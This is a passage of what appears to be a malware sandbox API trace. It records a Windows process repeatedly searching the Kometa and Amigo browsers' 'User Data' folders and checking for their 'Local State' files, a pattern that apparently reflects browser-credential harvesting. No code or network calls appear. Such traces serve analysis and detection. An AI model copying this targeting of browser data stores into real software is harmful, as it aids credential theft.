dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.087] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.087] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.087] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.087] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.087] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.087] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.087] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.087] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.087] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.087] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.087] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.087] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.088] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.088] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.088] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.088] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.088] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.088] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.090] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.090] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.090] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.090] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.090] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.090] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.090] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.090] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.090] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.090] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.090] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.091] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.091] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.091] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.091] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*") returned 56 [0207.091] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x63006f, ftCreationTime.dwLowDateTime=0x6c0061, ftCreationTime.dwHighDateTime=0x530020, ftLastAccessTime.dwLowDateTime=0x610074, ftLastAccessTime.dwHighDateTime=0x650074, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\x01")) returned 0xffffffff [0207.091] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19d51c | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0207.092] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Amigo\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" [0207.092] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" [0207.092] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", lpString2="\\Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State" [0207.092] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data\\local state")) returned 0xffffffff [0207.092] wsprintfA (in: param_1=0x19d2ec, param_2="%s\\*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*") returned 53 [0207.092] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*", lpFindFileData=0x19d1a4 | out: lpFindFileData=0x19d1a4*(dwFileAttributes=0x65, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.092] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.092] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.092] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.092] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.092] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.093] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.093] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.093] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.093] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.093] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.093] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.093] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.094] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.094] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.094] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.094] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.094] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.094] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.094] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.094] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.094] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.094] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.094] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 [0207.094] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*", lpFindFileData=0x19d194 | out: lpFindFileData=0x19d194*(dwFileAttributes=0x610063, ftCreationTime.dwLowDateTime=0x20006c, ftCreationTime.dwHighDateTime=0x740053, ftLastAccessTime.dwLowDateTime=0x740061, ftLastAccessTime.dwHighDateTime=0x65, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0207.095] wsprintfA (in: param_1=0x19d2dc, param_2="%s\\*.*" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data\\*.*") returned 55 